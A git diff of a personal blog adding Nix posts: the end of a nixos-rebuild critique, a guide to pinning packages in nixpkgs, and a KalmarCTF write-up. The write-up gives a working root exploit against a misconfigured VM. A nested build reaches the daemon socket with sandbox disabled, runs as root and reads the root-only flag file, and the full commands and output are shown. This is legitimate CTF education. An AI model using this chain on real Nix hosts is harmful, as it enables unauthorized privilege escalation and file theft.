+self-contained now. + +# Conclusion and analysis + +We really need to improve `nixos-rebuild` as the NixOS development community. +It embodies, at basically every juncture, obsolescent practices that confuse +users and waste time. Modern configurations should be using either +npins/equivalent or flakes, both of which should be equally valid and easy to +use choices in all our tooling. + +Flags like `--no-rebuild-nix` come from an era where people were building +flake-based configs from a Nix that didn't even *have* flakes, so they needed +to be able to switch to an entirely different *Nix* to be able to evaluate +their config. We should never be rebuilding Nix by default before re-evaluating +the configuration in 2024. The Nix language is much, much more stable these +days, almost frozen like a delicious ice cream cone, and so the idea of +someone's config requiring a brand new Nix to merely evaluate is bordering on +absurd. + +It doesn't help that this old flakes hack actually breaks cross compiling +NixOS configs, for which `--fast` is thus mandatory. The re-execution of +`nixos-rebuild` is more excusable since there is [still work to do on that like +capturing output to the journal](https://github.com/NixOS/nixpkgs/pull/287968), +but it is still kind of bothersome to eat so much evaluation time about it; I +wonder if a happier medium is that it would just build `pkgs.nixos-rebuild` +instead of evaluating all the modules, but that has its own drawback of ignoring +overlays in the NixOS config... + +Another tool that [needs rewriting, documentedly +so](https://github.com/NixOS/nixpkgs/issues/293543) is `nixos-option`, which is +a bad pile of C++ that doesn't support flakes, and which could be altogether +replaced by a short bit of very normal Nix code and a shell script. + +There's a lot of work still to do on making NixOS and Nix a more friendly +toolset, and we hope you can join us. I (Jade) have been working along with +several friends on , a soon-to-be-released fork of CppNix +2.18 focused on friendliness, stability, and future evolution. People +in our community have been working on these UX problems outside Nix itself +as well. We would love for these tools to be better for everyone. diff --git a/content/posts/pinning-packages-in-nix.md b/content/posts/pinning-packages-in-nix.md new file mode 100644 index 0000000..fa393d6 --- /dev/null +++ b/content/posts/pinning-packages-in-nix.md @@ -0,0 +1,310 @@ ++++ +date = "2024-05-19" +draft = false +path = "/blog/pinning-packages-in-nix" +tags = ["nix"] +title = "Pinning packages in Nix" ++++ + +Although Nix supposedly makes pinning things easy, it really does not seem so +from a perspective of looking at other software using pinning: it is not +possible to simply write `package = "^5.0.1"` in some file somewhere and get +*one* package pinned at a specific version. Though this is frustrating, there +is a reason for this, and it primarily speaks to how nixpkgs is a Linux +distribution and how Nix is unlike a standard language package manager. + +This post will go through the ways to pin a package to some older version and +why one would use each method. + +# Simply add an older version of nixpkgs + +> Software regressed? No patches in master to fix it? Try 30-40 different + versions of nixpkgs. An easy weeknight bug fix. You will certainly not regret + pinning 30-40 versions of nixpkgs. + +Unlike most systems, it is fine to mix versions of nixpkgs, although it will +likely go wrong if, e.g. libraries are intermingled between versions (*in +particular*, it is inadvisable to replace some program with a version +from a different nixpkgs from within an overlay for this reason). But, if one +package is all that is necessary, one can in fact simply import another version +of nixpkgs. + +This works because binaries from multiple versions of nixpkgs can coexist +on a computer and simply work. However, it can go wrong if they are loading +libraries at runtime, especially if the glibc version changes, especially if +`LD_LIBRARY_PATH` is involved. That failure mode is, however, rather loud and +obvious if it happens. + +For example: + +```nix +let + pkgs1Src = builtins.fetchTarball { + # https://github.com/nixos/nixpkgs/tree/nixos-23.11 + url = "https://github.com/nixos/nixpkgs/archive/219951b495fc2eac67b1456824cc1ec1fd2ee659.tar.gz"; + sha256 = "sha256-u1dfs0ASQIEr1icTVrsKwg2xToIpn7ZXxW3RHfHxshg="; + name = "source"; + }; + + pkgs2Src = fetchTarball { + # https://github.com/nixos/nixpkgs/tree/nixos-unstable + url = "https://github.com/nixos/nixpkgs/archive/d8fe5e6c92d0d190646fb9f1056741a229980089.tar.gz"; + sha256 = "sha256-iMUFArF0WCatKK6RzfUJknjem0H9m4KgorO/p3Dopkk="; + name = "source"; + }; + + pkgs1 = import pkgs1Src { }; + pkgs2 = import pkgs2Src { }; + +in +{ + env = pkgs1.buildEnv { + name = "env"; + paths = [ pkgs1.vim pkgs2.hello ]; + }; + + vim1 = pkgs1.vim; + vim2 = pkgs2.vim; +} +``` + +Here we have an environment which is being built out of packages from two +different versions of nixpkgs, so that `result/bin/hello` is from `pkgs2` and +`result/bin/vim` is from `pkgs1`. This can equivalently be done for +`environment.systemPackages` or similar such things: to get another version of +nixpkgs into a NixOS configuration, one can: + +- For flakes, one can inject the dependency [in some manner suggested by + "Flakes aren't real"][flakes-arent-real]. Or, one can do the + `builtins.fetchTarball` thing above. +- For non-flakes, one can do the `builtins.fetchTarball` thing shown above, or + add another input in [`npins`][npins]/Niv/etc, or add a second channel + (though we suggest migrating NixOS configs using channels to npins or + flakes so that the nixpkgs version is tracked in git). + +[flakes-arent-real]: https://jade.fyi/blog/flakes-arent-real/ +[npins]: https://github.com/andir/npins + +``` + » nix-build -A env /tmp/meow.nix +/nix/store/zilav8lqqgfgrk54wg88mdwq582hqdp9-env + +~ » ./result/bin/hello --version | head -n1 +hello (GNU Hello) 2.12.1 + + » ./result/bin/vim --version | head -n3 +VIM - Vi IMproved 9.0 (2022 Jun 28, compiled Jan 01 1980 00:00:00) +Included patches: 1-2116 +Compiled by nixbld + + » nix eval -f /tmp/meow.nix vim1.version +"9.0.2116" + + » nix eval -f /tmp/meow.nix vim2.version +"9.1.0148" +``` + +
+
Difficulty
+
Very easy
+
Rebuilds
+
+None, but will bring in another copy of nixpkgs and any dependencies (and +transitive dependencies). +
+
+ +# Vendor the package + +Another way to pin one package is to vendor the package definition of the +relevant version. The easiest way to do this is to find the version of nixpkgs +with the desired package version and then copy the `package.nix` or +`default.nix` or such into your own project, and then call it with +`callPackage`. + +You can find it with something like: + +``` + » nix eval --raw -f '' hello.meta.position +/nix/store/0qd773b63yg8435w8hpm13zqz7iipcbs-source/pkgs/by-name/he/hello/package.nix:41 +``` + +Or, equivalently, with `nix repl -f ''`, `:e hello` or to do the same +as above, `hello.meta.position`. + +Then, vendor that file into your configurations repository. + +Once it is vendored, it can be used either from an overlay: + +```nix +final: prev: { + hello = final.callPackage ./hello-vendored.nix { }; +} +``` + +or directly in your use site: + +```nix +{ pkgs, ... }: { + environment.systemPackages = [ + (pkgs.callPackage ./vendored-hello.nix { }) + ]; +} +``` + + +
+
Difficulty
+
Slight effort
+
Rebuilds
+
+For the overlay use case, this will build the overridden package and anything +depending on it. For the direct at use site case, this will just rebuild the +package, and anything depending on it will get the version in upstream nixpkgs. +
+
+ +# Patch the package with overrides + +nixpkgs offers several separate methods to "override" things that mean +different things. In short: + +- [`somePackage.override`][override] replaces the dependencies of a package; + more specifically the dependencies injected by `callPackage`. It accepts an + attribute set but can also accept a lambda of one argument, providing the + previous dependencies of the package. +- [`somePackage.overrideAttrs`][overrideAttrs] replaces the `stdenv.mkDerivation` + arguments of a package. This lets you replace the `src` of a package, in + principle. +- [`overrideCabal`][overrideCabal] replaces the `haskellPackages.mkDerivation` + arguments for a Haskell package in a similar way that `overrideAttrs` does for + `stdenv.mkDerivation`. This is internally implemented by methods equivalent + to the evil crimes below. + +[override]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-override +[overrideAttrs]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-overrideAttrs +[overrideCabal]: https://nixos.org/manual/nixpkgs/stable/#haskell-overriding-haskell-packages + +Here are some examples: + +Build an openttd with a different upstream source by putting this in +`openttd-jgrpp.nix`: + +```nix +{ openttd, fetchFromGitHub }: +openttd.overrideAttrs (old: { + src = fetchFromGitHub { + owner = "jgrennison"; + repo = "openttd-patches"; + rev = "jgrpp-0.57.1"; + sha256 = "sha256-mQy+QdhEXoM9wIWvSkMgRVBXJO1ugXWS3lduccez1PQ="; + }; +}) +``` + +then `pkgs.callPackage ./openttd-jgrpp.nix { }`. + +For instance, the following (rather silly) command will build such a file: + +``` + » nix build -L --impure --expr 'with import {}; callPackage ./openttd-jgrpp.nix {}' +``` + +## Limitations + +Most notably, [overrideAttrs doesn't work][overrideAttrs-busted] on several +significant language ecosystems including Rust and Go, since one almost always +needs to override the arguments of `buildRustPackage` or `buildGoPackage` when +replacing something. For these, either one can do crimes to introduce an +`overrideRust` function (see below), or one can cry briefly and then vendor the +package. The latter is easier. + +```nix +let + pkgs = import { }; + # Give the package a fake buildRustPackage from callPackage that modifies the + # arguments through a function. + overrideRust = f: drv: drv.override (oldArgs: + let rustPlatform = oldArgs.rustPlatform or pkgs.rustPlatform; + in oldArgs // { + rustPlatform = rustPlatform // { + buildRustPackage = args: rustPlatform.buildRustPackage (f args); + }; + }); + + # Take some arguments to buildRustPackage and make new ones. In this case, + # override the version and the hash + evil = oldArgs: oldArgs // { + src = oldArgs.src.override { + rev = "v0.20.9"; + sha256 = "sha256-NxWqpMNwu5Ajffw1E2q9KS4TgkCH6M+ctFyi9Jp0tqQ="; + }; + version = "master"; + # FIXME: if you are actually doing this put a real hash here + cargoSha256 = pkgs.lib.fakeHash; + }; + +in +{ + x = overrideRust evil pkgs.tree-sitter; +} +``` + +[overrideAttrs-busted]: https://github.com/NixOS/nixpkgs/issues/99100 + +Then: `nix build -L -f evil.nix x` + +
+
Difficulty
+
Highly variable, sometimes trivial, sometimes nearly impossible, depending +on architectural flaws of nixpkgs.
+
Rebuilds
+
+For the overlay use case of actually using this overridden package, this will +build the overridden package and anything depending on it. For the direct at +use site case, this will just rebuild the package, and anything depending on it +will get the version in upstream nixpkgs. +
+
+ +# Patch a NixOS module + +If one wants to replace a NixOS module, say, by getting it from a later version +of nixpkgs, see [Replacing Modules] in the NixOS manual. + +[Replacing Modules]: https://nixos.org/manual/nixos/stable/#sec-replace-modules + +# Patch the base system without a world rebuild + +It's possible to replace an entire store path with another inside a NixOS +system without rebuilding the world (but wasting some space (by duplicating +things for the rewritten version) and being somewhat evil/potentially unsound +since it is just a text replacement of the hashes). This can be achieved with +the NixOS option +[`system.replaceRuntimeDependencies`][replaceRuntimeDependencies]. + +[replaceRuntimeDependencies]: https://nixos.org/manual/nixos/stable/options#opt-system.replaceRuntimeDependencies + +# Why do we need all of this? + +The primary reason that Nix doesn't allow trivially overriding packages with a +different version is that it is a generalized build system building software +that has non-uniform expectations of how to be built. One can indeed see +that the "replace one version with some other in some file" idea is *almost* +reality in languages that use `mkDerivation` directly, though one might have to +tweak other build properties sometimes. Architectural problems in nixpkgs +prevent this working for several ecosystems, though. + +Another sort of issue is that nixpkgs tries to provide a mostly [globally +coherent] set of software versions, where, like most Linux distributions, there +is generally one blessed version of a library with some exceptions. This is, in +fact, mandatory to be able to have any cache hits as a hermetic build system: +if everyone was building slightly different versions of libraries, all +downstream packages will have different hashes and thus miss the cache. + +So, in a way, a software distribution based on Nix cannot have separate locking +for every package and simultaneously have functional caches: the moment that +everything is not built together, caches will miss. + +[globally coherent]: https://www.haskellforall.com/2022/05/the-golden-rule-of-software.html + diff --git a/content/posts/reproducible-pwning-writeup.md b/content/posts/reproducible-pwning-writeup.md new file mode 100644 index 0000000..12a402c --- /dev/null +++ b/content/posts/reproducible-pwning-writeup.md @@ -0,0 +1,295 @@ ++++ +date = "2024-03-16" +draft = false +path = "/blog/reproducible-pwning-writeup" +tags = ["ctf", "nix"] +title = "KalmarCTF: Reproducible Pwning writeup" ++++ + +I was making memes in the CTF room until someone told me Nix showed up +on a CTF, and well. It doesn't take that much to tempt me. + +Reproducible Pwning is a challenge written by +[niko](https://hachyderm.io/@nrab), which involves a NixOS VM you're supposed +to root. The build user is not notably privileged. + +There is a flag in `/data` which is mounted from the host via some means. That +directory is only readable by root. + +There is a patch to the Nix evaluator. Interesting: + +```patch +diff --git a/src/libutil/config.cc b/src/libutil/config.cc +index 37f5b50c7..fd824ee03 100644 +--- a/src/libutil/config.cc ++++ b/src/libutil/config.cc +@@ -1,3 +1,4 @@ ++#include "logging.hh" + #include "config.hh" + #include "args.hh" + #include "abstract-setting-to-json.hh" +@@ -17,6 +18,16 @@ Config::Config(StringMap initials) + + bool Config::set(const std::string & name, const std::string & value) + { ++ if (name.find("build-hook") != std::string::npos ++ || name == "accept-flake-config" ++ || name == "allow-new-privileges" ++ || name == "impure-env") { ++ logWarning({ ++ .msg = hintfmt("Option '%1%' is too dangerous, skipping.", name) ++ }); ++ return true; ++ } ++ + bool append = false; + auto i = _settings.find(name); + if (i == _settings.end()) { +``` + +The machine is configured with the following NixOS module, which I pulled out +of the included flake. The rest of the flake is normal stuff. There are a few +things that stand out to me: + +- sudo is disabled, polkit is disabled: we are probably not looking for some + setuid exploit +- There are some *extremely* nonstandard Nix config settings being applied + +```nix +({pkgs, ...}: { + nixpkgs.hostPlatform = "x86_64-linux"; + nixpkgs.overlays = [ + (final: prev: { + # JADE: likely vulnerable to puck's CVE, but I doubt that is the bug cuz they + # added a patch and there is other funny business up. + nix = final.nixVersions.nix_2_13.overrideAttrs { + patches = [./nix.patch]; + # JADE: due to broken integration tests, almost certainly + doInstallCheck = false; + }; + }) + ]; + + # JADE: no interesting setuid binaries + security = { + sudo.enable = false; + polkit.enable = false; + }; + + systemd.services.nix-daemon.serviceConfig.EnvironmentFile = let + # JADE: here is the wacky part of the config. + # This exposes the Nix daemon socket inside the sandbox (this is mostly + # never the case unless using recursive-nix). So we are going to + # be running a nix build inside a nix build to do something. + sandbox = pkgs.writeText "nix-daemon-config" '' + extra-sandbox-paths = /tmp/daemon=/nix/var/nix/daemon-socket/socket + ''; + # JADE: I don't know what this does, so we are going to be reading some C++Nix + # source code. But it sure smells like running the build as root. + buildug = pkgs.writeText "nix-daemon-config" '' + build-users-group = + ''; + in + # JADE: Sets additional config files to only the nix daemon. This is + # documented in the Nix manual. + pkgs.writeText "env" '' + NIX_USER_CONF_FILES=${sandbox}:${buildug} + ''; +}) +``` + +Here is the rest of the module which is uninteresting: + +{% codesample(desc="`boring-module.nix`") %} +```nix +{ ... }: { + # JADE: what the heck is this? It seems like some kind of kernel-problems + # storage thing. Later found out this is nothing. + environment.etc."systemd/pstore.conf".text = '' + [PStore] + Unlink=no + ''; + + users.users.root.initialHashedPassword = "x"; + users.users.user = { + isNormalUser = true; + initialHashedPassword = ""; + group = "user"; + }; + users.groups.user = {}; + + system.stateVersion = "22.04"; + + services.openssh = { + enable = true; + settings.PermitRootLogin = "no"; + }; + + # JADE: save some image size + environment.noXlibs = true; + documentation.man.enable = false; + documentation.doc.enable = false; + fonts.fontconfig.enable = false; + + nix.settings = { + # JADE: this option has no interesting security impact, just whether you + # can build during evaluation phase. + allow-import-from-derivation = false; + experimental-features = ["flakes" "nix-command" "repl-flake" "no-url-literals"]; + }; +} +``` +{% end %} + +So, to sum up: +- We have a Nix daemon socket in the sandbox. +- We are running builds with some weird group. +- Several config settings that make trusted users effectively root are + blocked by the patch. Interesting. We probably become a trusted user then. + +So like, let's run some build. + +```nix +let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a +'' +``` + +This gives me: + +``` +this derivation will be built: + /nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv +building '/nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +``` + +Hm. Boring, I was expecting to be root already. + +But, why is there a socket in there? Let's try invoking another build inside +our build, maybe? And, based on the assumption we must be trusted user (since I +can't think of any other reason interaction with the bind-mounted socket would +be different from inside the sandbox), let's try just turning off the sandbox +in the inner build and see what happens? + +```nix +let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; + # dont worry about the contents quite yet + hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix); +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a + nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax} +'' +``` + +and `stage2.nix`: + +```nix +let + pkgs = import (builtins.getEnv "PKGS") { }; +in +pkgs.runCommand "meow2" { } '' + echo MEOW2 + id -a +'' +``` + +This outputs: + +``` +this derivation will be built: + /nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv +building '/nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +this derivation will be built: + /nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv +building '/nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv'... +MEOW2 +uid=0(root) gid=0(root) groups=0(root) +``` + +Welp, I am root. Change stage 2 to `cat /data/*` and we have a flag: + +``` +[user@nixos:~]$ cat >stage1.nix <<-'EOF' +> let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; + hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix); +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a + nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax} +'' +> EOF + +[user@nixos:~]$ cat >stage2.nix <<-'EOF' +> let + pkgs = import (builtins.getEnv "PKGS") { }; +in +pkgs.runCommand "meow2" { } '' + echo MEOW2 + id -a + ls / || true + ls /data || true + cat /data/* +'' +> EOF + +[user@nixos:~]$ nix-build stage1.nix +warning: Nix search path entry '/nix/var/nix/profiles/per-user/root/channels' does not exist, ignoring +these 2 derivations will be built: + /nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv + /nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv +these 11 paths will be fetched (3.92 MiB download, 23.41 MiB unpacked): + +building '/nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv'... +warning: Option 'accept-flake-config' is too dangerous, skipping. +warning: Option 'allow-new-privileges' is too dangerous, skipping. +warning: Option 'build-hook' is too dangerous, skipping. +warning: Option 'post-build-hook' is too dangerous, skipping. +warning: Option 'pre-build-hook' is too dangerous, skipping. +building '/nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +this derivation will be built: + /nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv +warning: Option 'accept-flake-config' is too dangerous, skipping. +warning: Option 'allow-new-privileges' is too dangerous, skipping. +warning: Option 'build-hook' is too dangerous, skipping. +warning: Option 'post-build-hook' is too dangerous, skipping. +warning: Option 'pre-build-hook' is too dangerous, skipping. +building '/nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv'... +MEOW2 +uid=0(root) gid=0(root) groups=0(root) +bin dev home lib64 proc run sys usr +data etc lib nix root srv tmp var +flag +kalmar{0nlyReproduc1bleMisconfigurationsH3R3} +``` + +I was informed later that I found an unintended solution, and one was not +supposed to "simply set `sandbox = false`". The intended solution was to either +use the `diff-hook` setting which is run as the daemon's user (like +`post-build-hook` and `build-hook` which were conspicuously also banned), or +abuse being root to tamper with the inputs to the derivation and overwriting +something run by a privileged user. + +I don't think the unintended solution was that bad, though, because once you +are trusted user, it is assumed in the Nix codebase that you can just root the +box. diff --git a/templates/base.html b/templates/base.html index dc1baf1..b5ec4b0 100644 --- a/templates/base.html +++ b/templates/base.html @@ -17,6 +17,8 @@ + + {{ config.title }}